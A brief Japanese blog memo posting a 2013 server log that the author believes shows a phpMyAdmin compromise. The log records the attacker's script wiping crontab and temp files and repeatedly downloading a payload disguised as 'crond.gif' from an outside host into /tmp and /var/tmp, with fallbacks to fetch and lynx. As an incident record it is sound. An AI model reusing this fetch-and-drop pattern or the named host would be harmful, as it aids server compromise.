2016年03月26日
このエントリーをはてなブックマークに追加
昔の記事なのですが、公開されていなかったので、メモ。

本件のログですがおそらく、phpmyadmin の脆弱性を突いた攻撃だと思われます。
※詳細は当時のことなのでよく覚えていませんが・・・


no crontab for apache
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove directory `/tmp/.ICE-unix': Operation not permitted
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
rm: cannot remove `.' or `..'
--2013-01-07 20:14:20-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'

0K .......... ..... 100% 23.0K=0.7s

2013-01-07 20:14:22 (23.0 KB/s) - `crond.gif' saved [15620/15620]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 0 15620 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 15620 100 15620 0 0 11675 0 0:00:01 0:00:01 --:--:-- 23348
sh: fetch: command not found
sh: lynx: command not found
--2013-01-07 20:14:25-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/tmp/but.gif'

0K .......... ..... 100% 22.9K=0.7s

2013-01-07 20:14:26 (22.9 KB/s) - `/tmp/but.gif' saved [15620/15620]

--2013-01-07 20:14:26-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `crond.gif'

0K .......... ..... 100% 22.7K=0.7s

2013-01-07 20:14:28 (22.7 KB/s) - `crond.gif' saved [15620/15620]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 8 15620 8 1448 0 0 2133 0 0:00:07 --:--:-- 0:00:07 2133^M100 15620 100 15620 0 0 11550 0 0:00:01 0:00:01 --:--:-- 21057
sh: lynx: command not found
--2013-01-07 20:14:31-- http://brain.do.am/crond.gif
Resolving brain.do.am... 217.199.217.10
Connecting to brain.do.am|217.199.217.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15620 (15K) [image/gif]
Saving to: `/var/tmp/crond.gif'

0K .......... ..... 100% 22.6K=0.7s

2013-01-07 20:14:32 (22.6 KB/s) - `/var/tmp/crond.gif' saved [15620/15620]


stock_value at 13:15│Comments(0)TrackBack(0)技術:2012年 

トラックバックURL

この記事にコメントする

名前:
URL:
  情報を記憶: 評価: 顔